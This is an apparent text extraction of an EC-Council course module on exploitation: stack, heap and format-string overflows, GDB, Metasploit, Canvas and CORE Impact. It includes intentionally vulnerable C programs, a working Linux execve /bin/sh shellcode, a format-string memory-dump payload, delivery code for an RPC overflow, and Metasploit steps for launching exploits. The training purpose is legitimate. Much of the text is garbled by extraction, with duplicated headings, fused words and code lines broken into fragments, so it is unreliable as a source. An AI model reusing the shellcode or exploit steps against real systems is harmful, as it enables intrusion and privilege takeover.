ecsav4 module 10 advanced exploits and tools_norestriction

Advanced i i Penetration Testing

and Security Analysis

Module 10Module 10Advanced Exploits

and Tools

Copyright © 2004 EC-Council. All rights reserved worldwide.EC-CouncilCopyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited

and Tools

Module Objective

This module will familiarize you with:

• Common Vulnerabilities Revisited

with:

• Anatomy of an Exploit: A Typical Overflow • Tools of the Trade:

• GDBl i• Metasploit

• Canvas • CORE Impact


All Rights Reserved. Reproduction is Strictly Prohibited 2

Common Vulnerabilities

1• Buffer overflows

2• Heap overflows

3• Format string flaws

3



Buffer Overflows Revisited

Ralph Echemendia

Ralph EchemendiaRalph Echemendia



Smashing the Stack for Fun and ProfitFun and Profit

Example code:

void main

(int argc, char **argv[])

{

char buffer[256];

strcpy(buffer, argv[1]);

printf(“Buffer::%s\n"printf(“Buffer::%s\n", buffer);

}



Smashing the Stack forFun and Profit (cont’d)Fun and Profit (cont d)

Since there are no bounds checking, anything larger than the buffer runs off into uncontrolled memory space. This gives us the potential to overwrite the EIP pointer, hijacking the execution flow of the program. p g

With control of EIP, we can write our own RET address in, and f th t t d f d i i d it force the program to execute code of our devising under its security context.

For example, code might spawn a remote netcat shell with the privileges of the user-context exploited. If this context is Root or Administrator, the system is completely compromised.



Smashing the Stack for Fun and Profit (cont’d)Fun and Profit (cont d)

• A segmentation fault occurs when a program attempts to do things with memory that it isn’t supposed to.

• For example, attempting to write to a read-only address, or following a return address that leads to an odd location. Segmentation

fault: • Segfaults are often signs of a potentially

exploitable condition. • If dumping large amounts of data into program

i f l h i d h

fault:

Foo causes it to segfault, there is a good chance that there is an exploitable bug that could lead to execution control.



Smashing the Heap for Fun and Profit (cont’d)Fun and Profit (cont d)

• It is very important that the pointer come after

Heap overflows:

• It is very important that the pointer come after the buffer being overflowed, since the heap grows upward.

• Fill in the buffer. Overwrite the pointer, and i i h dd f d point it to the address of our own code.

• Note that the heap must be executable in order for our code to execute.

• Other arcane tricks are possible using function Other arcane tricks are possible using function binding in C++ or tricks with the DLMALLOC library.



Smashing the Heap forFun and Profit (cont’d) Fun and Profit (cont d)

Th t k i d f i iti li ti f t

Stack versus heap:

• The stack is used for initialization of temporary values. Variables, arrays, etc.

• The heap, however, is used to store things that are expected to persist throughout the execution cycle

fof the program. • Heap overflows are usually more difficult to

exploit than traditional Stack-based Buffer Overflows. You need a statically defined buffer yand a pointer:

• static char buf[BUFSIZE]; • static char *ptr_to_something;



Format Strings forChaos and MayhemChaos and Mayhem

Format string vulnerabilities

Did you really mean to type ‘printf(buffer)’? Or did you mean ‘printf(‘%s’, buffer)’? In the first example, the buffer is evaluated as a format string, and any formatting instructions will be parsed.

If buffer is made up of user input, things can get interesting.

Use formatting tokens (%s, %x) to start exploring the stack space, returning memory addressesreturning memory addresses.

With some cleverness you can map out memory space nicely, return



addresses, shellcode, etc.

Format Strings for Chaos and Mayhem (cont’d)Chaos and Mayhem (cont d)

Code examples: Use format strings to print the buffer.

static char find_me[] = "..Buffer was lost in memory\n";

main()

{

char buf[512];

char tmp[512];

while(1) {

memset(buf, '\0', 512);memset(buf, \0 , 512);

read(0, buf, 512);

sprintf(tmp ,buf);

i tf("% " t ) }



printf("%s", tmp); }

}

Format Strings forChaos and Mayhem (cont’d)Chaos and Mayhem (cont d)

Format string vulnerabilities:

• How do you get the buffer to be displayed? Simple. Just use the four-byte address of the buffer as an argument to %s. printf “\x41\x41\x41\x41%s\n” piped to your program, for example.

• You can use this to dump arbitrary memory locations. No more hunting for RET addresses. You can inspect memory and find it.



Format Strings for Chaos and Mayhem (cont’d)Chaos and Mayhem (cont d)

Format strings: writing into memory:

%n is a very useful little formatting token. It takes an int *as an argument and writes the number of bytes alreadyas an argument, and writes the number of bytes alreadywritten, to that location.

By carefully controlling the number of bytes written, andbreaking the writes up into small operations, you canconstruct a memory address to be written to an arbitrarylocation using %n.



The Anatomy of an Exploit

Vulnerable d Shellcode Delivery

d

Tools of the Trade: code Shellcode code Trade:

Debuggers



Vulnerable Code

Some more vulnerable code:

int main(int argc, char *argv[])

{{

char buffer[500];

if(argc>=2) strcpy(buffer, [1])argv[1]);

return 0;

}

A basic program that creates a 500-byte buffer,

and puts the first command line argument into it



and puts the first command line argument into it

Shellcode

We have 500 bytes to play with.

Since we have to fill up the buffer anyway, why not fill it with our malicious code?

Shellcode is the code to be loaded; we mention malicious code into memory for execution. It is in the format of raw ‘opcodes’, which are executed directly by the CPU.

Shellcode is often architecture and OS dependant. Code written for Linux on Sparc won’t work on an X86 Linux system. Likewise, code for Windows is different than code for Linux.



Shellcode Examples

char shellcode[]=

"\x31\xc0" // xorl %eax,%eax

"\x50" // pushl %eax

"\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e

"\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f

"\x89\xe3" // movl %esp,%ebx

"\x99" // cltd

"\x52" // pushl %edx

"\x53" // pushl %ebx

"\x89\xe1" // movl %esp,%ecx

\ \ //"\xb0\x0b" // movb $0xb,%al

"\xcd\x80" // int $0x80

Root shell spawned with execve() call for Linux



Root shell spawned with execve() call for Linux

Shellcode (cont’d)

Null Operations

NOPs are any exploit writer’s friends. All they do is tell the CPU to wait for a bit, then go on to the next instruction.

How do you tell where your shellcode is in memory? Often times you can’t find the exact start of the code.

Instead, you can pad your code with NOPs. With our 500 byte buffer we have quite a lot of f b t f Sh ll d t li space for, say, 50 bytes of Shellcode to live.

Since it is difficult to tell where exactly the code starts, stick in 450 bytes of null operations before the shell code.

Redirect the execution flow to point somewhere towards where you think the beginning of the buffer is.

The CPU will hit the NOPs, and ‘slide’ through them until it hits the shellcode payload, thus



The CPU will hit the NOPs, and slide through them until it hits the shellcode payload, thus giving rise to the term ‘NOP Slide’.

Delivery Code

The delivery code is designed to deliver they gshellcode to the target machine:

A k i i dAny network communication codenecessary, such as generating an HTTPrequest, or filling in a login field.

Handles loading the code into memory,and filling up the vulnerable buffers.

Error handling. User friendliness. The‘glue’ that holds the ‘sploit’ together



glue that holds the sploit together.

Delivery Code: Example

Delivery script snippet, setting up the connection for a RPC overflow:FD_ZERO(&fdreadme);FD SET(sockfd, &fdreadme);FD_SET(sockfd, &fdreadme);FD_SET(0, &fdreadme);while(1) {FD_SET(sockfd, &fdreadme);FD_SET(0, &fdreadme);if(select(FD_SETSIZE, &fdreadme, NULL, NULL, NULL) < 0 ) break;if(FD_ISSET(sockfd, &fdreadme)) {if((i = recv(sockfd, rb, sizeof(rb), 0)) < 0{printf("[-] Connection lost..\n");

it(1) }exit(1);}if(write(1, rb, i) < 0) break;}

if(FD_ISSET(0, &fdreadme)) {if((i = read(0, rb, sizeof(rb))) < 0){printf("[-] Connection lost..\n");printf( [ ] Connection lost..\n );exit(1);}

if (send(sockfd, rb, i, 0) < 0) break;}usleep(10000);}

printf("[-] Connection closed by foreign host..\n");



exit(0);}

Linux Exploits versus Windows

Shellcode is simpler and smaller than in Windows Examples run as small as Shellcode is simpler and smaller than in Windows. Examples run as small as 24 bytes. Syscalls make life much easier.

Syscalls are predefined standard functions that the kernel will perform for you.

To use a syscall, you fill a few registers with data, then fill another register with the number of the syscall you want to use, and execute an interrupt.

Using execve(), you can fork the current process and execute a file. For example, fork the current and execute /bin/sh.



p , / /

Linux Exploits versus Windows (cont’d)(cont d)

• Windows requires larger shellcode This places a lower limit

Smaller shellcode size means easier exploitation:

• Windows requires larger shellcode. This places a lower limit on the size of buffers that can be exploited.

• With shellcode of 24 bytes, many more possibilities are opened.

With linux becoming easier, more people with less skill are getting into it:

• The old adage about ‘Linux users being more security minded’ is no longer very true.

• Linux machines make juicy targets.



Windows versus Linux

Wi d h h l lithi d b Windows has a much more complex, monolithic codebase than most Linux systems.

Linux is a kernel. Windows is an entire integrated OS. This presents a larger attack surface.

Windows is the most widely used operating system in the world. This means more eyes are looking and therefore it is a higher profile target.

Writing exploits for Windows, however, is somewhat more difficult than Linux.



Windows versus Linux(cont’d)(cont d)

Writing shellcode is more complex. g p

Windows shellcode doesn’t seem to get much smaller than about 800 bytes. This places a lower limit on the size of buffer than can be exploited.

Denial-of-Service attacks are still possible with smaller buffers, however.

Windows doesn’t use Syscalls. You have to directly manipulate the Windows API.

There aren’t any clean methods for spawning a shell All of this combines to There aren t any clean methods for spawning a shell. All of this combines to greatly increase the size of shellcode necessary for a successful ‘sploit.

Offsets and RET addresses can change from Service Pack to Service Pack as well, f th li ti i



further complicating issues.

Tools of the Trade: DebuggersDebuggers

Offsets? Return addresses? EAX? EIP?

• Where is your bad buffer located? Where did your shellcode go?Where do you return to, now that you have control of theexecution flow?

• A debugging tool is essential to discovering these things anddiscovering exactly what is happening in memory.

• OllyDBG and GDB are some of the more commonly useddebuggers for the nefarious purposes of exploitation.

• Standard practice is to set up a machine as close to the target aspossible. Run the vulnerable application through a debugger.



• Watch what happens, where ideally you will at least get close to thetarget.

Tools of the Trade:GDBGDB

GDB has ports to every major operating system and is one of the more widely used debuggersdebuggers.

It is extremely powerful and flexible, and free as well.

You can launch GDB in a variety of ways:

To launch GDB with an executable:

• Type gdb <binary>

To load a core file:

• Type gdb <core-file>

To attach to a running process, first launch GDB, and then:



• Type attach <pid>

Tools of the Trade:GDB (cont’d)GDB (cont d)

Searching through memory:

• show decimal(gdb) x/d or x 'address'

• show next 100 decimals(gdb) x/100s 'address'

• show decimal at 0x0804846c(gdb) x 0x0804846c

• show strings at address(gdb) x/s 'address'

• show 105 strings at 0x0804846c(gdb) x/105 0x0804846c 5 g 4 4(g ) / 5 4 4

• show hexadecimal address(gdb) x/x 'address'

• show 10 addresses at 0x0804846c(gdb) x/10x 0x0804846c

• show byte at 0x0804846c(gdb) x/b 0x0804846c

• show byte at 0x0804846c-10(gdb) x/10b 0x0804846c-10

• show byte at 0x0804846c+20(gdb) x/10b 0x0804846c+20



• show 20 assembler instructions at address(gdb) x/20i 0x0804846c

Tools of the Trade:GDB (cont’d)GDB (cont d)

Breakpoints:

• To set a breakpoint, type break <name of function or memory address>

Breakpoints:

• Then type run to run the loaded executable.• Execution will continue until the breakpoint reaches the matched

function.

For e ample if ou kne there as a ulnerabilit in function foo

Breakpoints are useful to freeze the execution flow of a binary, and analyze the memory state:

• For example, if you knew there was a vulnerability in function foo, then you could set a breakpoint on the execution of foo.

• The debugger would freeze the program, and allow you to dissect and analyze foo and determine the precise addresses necessary for the ‘ l i



‘sploit.

Tools of the Trade: GDB (cont’d)GDB (cont d)

• To show the value of a register, type print $<register>

• To show all registers at a given point, type info registers

Additional commands

• To list the sections of an executable, type maintenance info sections

A di bl f i

commands:

• Attempt to disassemble a function, type disassemble <function>



Tools of the Trade:MetasploitMetasploit

Why do it all yourself? Repeatability is yourfriend:

• The Metasploit framework in an open source platform for vulnerability research and development, and penetration testing.

• Metasploit handles building shellcode and delivery code for you. You p o d b d g od d d y od o yo oselect the payload you want, then select the exploit to use. Push a button, and it fires, attempting to exploit the remote service.

http://www.metasploit.com/



Tools of the Trade: Metasploit (cont’d)Metasploit (cont d)

Metasploit includes exploits such as the following:

msf > show exploits

Metasploit Framework Loaded Exploits====================================AppleFileServer LoginExt PathName Buffer OverflowApache Win32 Chunked EncodingISS PAM.dll ICQ Parser Buffer OverflowDistCC Daemon Command ExecutionExchange 2000 MS03-46 Heap OverflowFrontpage fp30reg.dll Chunked EncodingIA WebMail 3.x Buffer OverflowIA WebMail 3.x Buffer OverflowIIS 5.0 nsiislog.dll POST OverflowIIS 5.0 Printer Buffer OverflowIIS 5.0 WebDAV ntdll.dll OverflowIM il LDAP S i B ff O fl



IMail LDAP Service Buffer OverflowMicrosoft LSASS MSO4-011 Overflow

Metasploit Frame Work



Tools of the Trade: Metasploit (cont’d)Metasploit (cont d)

Metasploit includes exploits such as the following:p p g

• Mercantec SoftCart CGI Overflow• Microsoft RPC DCOM MSO3-026

MSSQL R l ti O fl• MSSQL 2000 Resolution Overflow• Poptop Negative Read Overflow• RealServer Describe Buffer Overflow• Samba Fragment Reassembly Overflow• Samba trans2open Overflow• Samba trans2open Overflow• Sambar 6 Search Results Buffer Overflow• Serv-U FTPD MDTM Overflow• SMB Password Capture Service• Solaris sadmind Command ExecutionSolaris sadmind Command Execution• Squid NTLM Authenticate Overflow• Subversion Date Svnserve• Unreal Tournament 2004 "secure" Overflow (Linux)• Unreal Tournament 2004 "secure" Overflow (Win32)



• War-FTPD 1.65 PASS Overflow• Windows SSL PCT Overflow

Tools of the Trade:Metasploit (cont’d)Metasploit (cont d)

Metasploit has several payloads that can be automatically combined with the listed exploits.

• Shellcode payloads exist for Windows, BSDI, Solaris, Linux, Mac OS X and FreeBSDOS X, and FreeBSD.

• The payloads can execute arbitrary commands, spawn shells, reverse-connect shells, load VNC, connect back with VNC, inject DLLs, and more.

• Encoding engines also exist for the major platforms. The encoding engines encrypt and change your shellcode to bypass signature-based detection.



Metasploit

1• Starting and running Metasploit

1.

2.• The environment

3.• Common commands

4.• Setting up an exploit

Launching the exploit5.

• Launching the exploit

6• Advanced features



6.

35

User-Interface Modes

• It is the Metasploit Interactive Shell User Interface.

Msfconsole:

p• It’s the most useful for learning the program and for playing with the system.

Msfcli:

• It is the command-line interface.• It isn’t as user-friendly, but provides for easy scripting and is good for batch jobs.

• It is the web interface.• The interface is still a bit rough, but is useful for team environments.

l d h d d h bMsfweb:

• Exploited machine connections are proxied to a random port on the web server.• The user is then given a telnet link to the listener.



*Note that the web interface currently has very little security, and only listens on local host by default*

Console Screenshot



Msfweb Console: Screenshot



Metasploit: Environment

The Metasploit environment system is logically divided into two components,the temporary environment and the global environment.

• The Global Environment is just that, global.• Variables set here apply to everything

Global• Variables set here apply to everything.

• The Temporary Environment overrides the Global Environment.

Temporary

p y• Each exploit has its own Temporary Environment, which is loaded and unloaded with

the exploit.



Metasploit:Environment (cont’d)Environment (cont d)

Global environmental variables allow you to set options that are the same across multiple exploits to save time:

• For example if you are using only a certain payload you can specify the• For example, if you are using only a certain payload, you can specify thePAYLOAD variable in the Global Environment to set it across all machines.

Using the Environment effectively is key to making Metasploit fast and effective for you.

The Framework can be controlled in a very fine grained manner via the various variable options available.



Environment: Global Environment Global Environment

To interact with the global environment, use the commands ‘setg’ and ‘unsetg’:

• Setg, by itself, displays the current Global Environment. To set a variable use setg foo bar where foo is the variable and bar is its value.

• Unsetg will clear the entire Global Environment• Unsetg will clear the entire Global Environment.

The global environment is loaded from defaults on startup. You can save new Global and Temporary Environments with the ‘save’ commandnew Global and Temporary Environments with the save command.



Environment: Temporary EnvironmentTemporary Environment

Th T E i i d h h h d The Temporary Environment is accessed through the set and unset commands.

Variables that are set are specific to the exploit that is loaded. oaded.

Inactive environments are simply stored in memory until the Inactive environments are simply stored in memory until the exploit they are associated with is loaded.



Metasploit: Environment ScreenshotScreenshot



Metasploit: Options

Useful environmental variables:

• Enables or disables session loggingLogging

• Where the logs will be storedLogDir

• Comma separated list of preferred encodersEncoder

• Same as above, except for the NOP enginesNop

• Allows randomized NOP sleds to be usedRandomNops

• Forces all TCP links to go through specified proxiesProxies g g p po es

• Redirects payload connections to the specified server running the Metasploit SocketNinja tool NinjaHost

• Used to exploit multiple systems at once NinjaDontKill



• Used to exploit multiple systems at once NinjaDontKill

• Required to use the InlineEgg Python payloadsEnablePython

Metasploit: Commands

Informational commands:

help. If you ever get lost, just type ‘help’

hshow:

•show exploits – shows loaded ‘exploits•show payloads – shows payloads available

h d h th il bl di i•show encoders – shows the available encoding engines•show nops – shows the available NOP engines •show options – shows the configurable options for an exploit•show advanced shows advanced options for an exploit•show advanced – shows advanced options for an exploit

info. Info gives you detailed information on a payload or an exploit.



Nop and Payload Generation ScreenshotScreenshot



Metasploit: Commands (cont’d)Commands (cont d)

Setting up your exploit:

1• Use show exploits to list the loaded exploits.

2• Once you find your poison of choice, load it by typing use <name of exploit>

2y y p y yp g

3• Configure the exploit.

4• Type show options to see what variables can be set for the option.

4• You’ll usually use RHOST and RPORT to specify the target and port number.

5• Some exploits have advanced options.

U h d d t th



6• Use show advanced to see them.

Metasploit:Commands (cont’d)Commands (cont d)

Once your options are set, test them with the checkcommand:

• The check command verifies all your options, and attempts to verify that the target is actually vulnerable, if possible.

• Not all exploits have check functionality built in. check should never result in ha m to the emote machineharm to the remote machine.

Set your payload:

• Select a payload from the list, and link it to the exploit with the command set payload <name of payload>.

• Show options can be used to show any options.

• If an exploits supports multiple platforms then you will need to set the target

Now select a target:



• If an exploits supports multiple platforms, then you will need to set the target variable.

• Default is bruteforcing the remote system’s type, which often isn’t desirable.

Metasploit: Launching the ExploitLaunching the Exploit

• Now comes the most complicated part of all. Once you have all of the

Launching the exploit:

p p ycommands set up, you now have to go through an intricate dance comprised of memorized sequences and good timing. Only the most 1337 of h@x0z will master the final steps….the pathway to pwnage….



Metasploit: Launching the Exploit (cont’d)Launching the Exploit (cont d)

l i i C l lf Type exploit. Hit enter. Congratulate yourself

f b i l tfor being l33t



http://www.metasploit.com/

Metasploit: Background Exploit ScreenshotExploit Screenshot



MetaSploit: Advanced FeaturesAdvanced Features

• InLineEgg is a Python class designed for generating small ASM programs.

• This is commonly used for generating custom payloads.

• Built by Gera from CoreST for their Core Impact tool, but the class was released under an open license.

InLineEgg Python p

• The exploit payloads are dynamically generated based off of Python scripts in the payloads/external directory.

yt o payloads:

• The enablepython environmental variable must be set to use this. Setting it to any non-zero value will work.



Advanced Features (cont’d)

Impurity ELF injection:

• Metasploit supports Alexander Cuttergo’s method ofloading and running an ELF executable in memory.

• This allows for very complex payload code to be writtenThis allows for very complex payload code to be writtenand compiled using standard C.

• All you need is a special wrapper payload.• The pexec option must be set to the path of thep p p

executable.• The executables must be compiled just right, however.




• Using the proxy variable, mentioned earlier, you can chain multiple proxies to mask your presence. p

• Each server must be in the format type:host:port, where type is either HTTP or

Proxy chaining

yp p , ypSOCKS4.

• The chaining functionality has tested stable

chaining:

with over five hundred proxies configured in a random chain.




Wi DLL I j i l d

• Metasploit is able to execute staged payloads that can inject

Win32 DLL Injection payloads:

• Metasploit is able to execute staged payloads that can injectcustom DLLs into memory, using any win32 exploit.

• The DLLs are not written to disk, and reside only in memory,forked off the owned process.

• Build a standard DLL. Export a function called ‘init’, and have ittake a single argument an int which is the socket descriptor oftake a single argument, an int, which is the socket descriptor ofthe connection.

• Init is launched in a new thread when the process is exploited.




VNC DLL injection:

• To demonstrate the capabilities of DLL injection, metasploit ships with the ability to load a VNC server on the target.

• A custom payload was developed using the VNC server created by Matt Miller off of the RealVNC codeMatt Miller off of the RealVNC code.

• This payload starts up a VNC server on exploitation. It will first attempt to grab control of the user’s desktop.

• If it fails, then it will fall back to ‘read-only’ mode, where you can view the desktop, but not interact with it.

• If access is gained, then VNC will spawn a command shell, with the privileges of the user the exploited process was running as.

• This is useful when you exploit a service running as Local system



• This is useful when you exploit a service running as Local_system, but grab a desktop from an unprivileged user.

Metasploit VNC Injection



Lab

Metasploit: Take time as defined by your instructor to usethis tool to exploit a vulnerable host(s) on YOUR targetorganization



Tools of the Trade: CanvasCanvas

Canvas is a commercial shellcode and payload generator written in Python by Dave AitelPython by Dave Aitel.

http://www.immunitysec.com/



Tools of the Trade: Canvas (cont’d)Canvas (cont d)

Some exploits in CANVAS are available

h lTake advantage of over 50 exploits, written and

tested by Immunity's team

Completely open design allows a team to adapt

CANVAS to their environment and needs

Advanced infrastructure is second

to none, and exploits get updated as often as

weekly

nowhere else:•Microsoft ASN.1 exploit•Exploits for Immunity Research vulnerabilities such as:•NAI ePolicy Orchestrator•Compaq Web Management •Computer Associates Unicenter



Tools of the Trade: Canvas (cont’d)Canvas (cont d)

Does not restrict your use of CANVAS to any particular IP range or useDoes not restrict your use of CANVAS to any particular IP range or use

Does not expire when your support period is over

CANVAS works on Windows 2000, XP, and Linux (or any other system that runs Python 2.2 or greater and pyGTK)

Delivery of CANVAS is purely over the Internet

Notifications are sent to your email address and you can download CANVAS at Notifications are sent to your email address, and you can download CANVAS at any time from the Immunity website

Watermarked to the customer, if your copy of CANVAS leaks, b f d dditi l t d d t



you may be refused additional support and updates

Screenshots



Lab

Canvas: Take time as defined by your instructor to use this tool toexploit a vulnerable host(s) on YOUR target organization.



Tools of the Trade: CORE ImpactCORE Impact

CORE Impact

CORE Impact is a commercial shellcode and payload generator as well.



Tools of the Trade: CORE Impact (cont’d)CORE Impact (cont d)

CORE Impact is an automated, comprehensive penetration testing product for assessing specific information security threats to an organizationspecific information security threats to an organization.

CORE IMPACT can be run completely autonomously. The steps in this process include:

1 • Information Gathering.

2 • Attack and Penetration.2

3 • Local Information Gathering.

4 • Privilege Escalation.4 Privilege Escalation.

5 • Clean Up.

• Report Generation



6 • Report Generation.

Tools of the Trade: CORE Impact (cont’d)CORE Impact (cont d)

Identify the real risk to your organization with

• Automates, and reduces the cost of the critical, but previously l d i i i

Identify the real risk to your organization with CORE Impact:

manual and expensive penetration testing process.• Allows organizations to safely launch real-world attacks by running

exploits against a target network without altering the system.• Conducts all testing procedures methodically in one visual software • Conducts all testing procedures methodically in one visual software

package.• Tests for external and internal vulnerabilities, including those that

relate to how network components work together.• Eliminates false positives, reports precisely where a network could

be penetrated and the associated security risks.• Helps prioritize remediation efforts.



IMPACT Industrializes Penetration TestingPenetration Testing

Mimics attacker behavior ⏐ launches real-world attacks safely and

WHAT DOES CORE IMPACT DO?

Mimics attacker behavior ⏐ launches real world attacks safely and efficiently, demonstrating exactly what an attacker can do.

Industrializes penetration testing ⏐ automates previously manual, expensive process with Core Impact Rapid Penetration Test (RPT).expensive process with Core Impact Rapid Penetration Test (RPT).

Provides important features:

• Commercial-grade exploits• Innovative agent technology• Powerful user interface• Automation of repetitive tasks• Complete log of all activities• Customizable reporting• Links to fixes



• Links to fixes

Ways to Use CORE Impact

Advanced penetration testing scenarios:

• External attacker with no previous knowledge• Internal attacker w/access to internal network

V ifi ti f IDS d th it t lVerification of IDS and other security controls:

• Verify external and internal taps• Tune rule-sets to an appropriate threshold

• Reduces false-positives and increases responsiveness

Intrusion response team testing:

G t t l t th t t li ti i t i• Generates actual events that create a realistic intrusion

Researching new areas and technologies



Other Benefits of CORE Impactp

Shortcomings of CurrentShortcomings of Current

InefficientR li di t ft k The only framework that encompasses

Shortcomings of CurrentShortcomings of CurrentPenetration Testing MethodologiesPenetration Testing Methodologies Major Benefits ofMajor Benefits of

- Reliance on disparate software packages- Manual performance of tedious tasks- Inconsistent execution

The only framework that encompasses all the Penetration Testing phases

Error-prone- Manual logging from software to software- Clean-up non-existent

Complete log of all activities in a central database

Hard to scale- Steep learning curve- Labor-intensive

Expensive

Makes the Penetration Testing practice more professional and scalable



- Expensive

Anatomy of a Real World Attack

PC loaded with CORE IMPACT

Agents

A target server is attacked and compromised; an agent is then deployed on the server



The acquired server is used as a vantage point to penetrate the corporate net

Further attacks are performed as an internal user

Client Side Exploits

Agent Listener

Communication back to the consoleagent

workstation

attack



Tools of the Trade:CORE Impact

"It used to take me two days to replicate a network attack and see what resources were exposed

p

James CuppsChief Information Security Officer – Sappi Fine Paper

et o attac a d see at esou ces e e e posed- with IMPACT it now takes 20 minutes.”

"IMPACT is the first commercial productthat allowed us to penetrate systems and applicationsand show the real implication of vulnerabilities.”

"We needed a way to evaluate IDS

Bill StevensonInformation Security Officer – New Century Financial Corporation

Richard TaylorComputer and Network Security Specialist

ysolutions and test IDS implementations.

CORE IMPACT helps us do that.”

Core Security Technologies



p y pLos Alamos National Laboratory

y g46 Farnsworth St · Boston, MA 02210Ph: (617) 399-6980 · Fax: (617) 399-6987w w w . c o r e s e c u r i t y . c o m

Impact Demo Lab

CORE Impact: Your instructor will be demonstrating this tool to exploit a vulnerable host(s) on YOUR target organization.



Microsoft Baseline Security Analyzer (MBSA) Analyzer (MBSA)

MBSA detects common security misconfigurations and missing security y g g yupdates on your computer systems.

It helps small- and medium-sized businesses to determine their security state p yin accordance with Microsoft security recommendations and offers specific remediation guidance.

Some of the features of MBSA are as follows:

• Scans for insecure computer configurations local remote or group of computers• Scans for insecure computer configurations, local, remote, or group of computers• Scans for common administrative vulnerabilities• Reports updates that are not yet approved on the Update Services server• Specifies alternate user name and password for remote administrative vulnerability

i ( ll f it d t i )



scanning (as well as for security update scanning)

Microsoft Baseline Security Analyzer (MBSA) (cont’d)Analyzer (MBSA) (cont d)



Network Security Analysis Tool (NSAT)Tool (NSAT)

Network Security Analysis Tool (NSAT) is a robust scanner.

It is a fast, stable bulk network security scanner designed to audit remote network services scanner.

It is designed for:

• Keeping different kinds of wide-ranging scans stable for days.• Performing professional-grade penetration testing and

comprehensive auditing.• Archiving full-scale of vulnerability easily and version

information for further purposes.• Virtual host support, host/network exclusion support.

Flexible and configurable scanning



• Flexible and configurable scanning.• Distributed scanning (new feature; beta status).

Network Security Analysis Tool (NSAT): ScreenshotTool (NSAT): Screenshot



Sunbelt Network Security Inspector (SNSI)Inspector (SNSI)

SNSI is licensed per Administrator, and lets you scan unlimited machines and IP addresses.

SNSI uses the latest Mitre Common Vulnerabilities and Exposures (CVE) and SNSI uses the latest Mitre Common Vulnerabilities and Exposures (CVE) and contains the latest SANS/FBI top 20 vulnerability list.

Following are the features of SNSI:

• It has large number of vulnerabilities in its databaseg• Scans and analyzes entire domain or selected systems in the domain• It performs frequent vulnerability database updates • It provides the detailed report after scanning

P f fi ld b d hi f l biliti



• Performs field based searching for vulnerabilities

Network Security Inspector: ScreenshotScreenshot



Summary

Common vulnerabilities have been revisited and discussed.

The anatomy of an exploit and a typical overflow has been explained.

Strengths and uses of payload generators and exploitation tools including: GDB Metasploit Canvas and CORE Impact were discussedincluding: GDB, Metasploit, Canvas, and CORE Impact were discussed.



ecsav4 module 10 advanced exploits and tools_norestriction

Documents

rights reserved worldwide

0x0804846c show byte

metasploit includes exploits

rights reserved

core impact

format strings

heap overflows

advanced features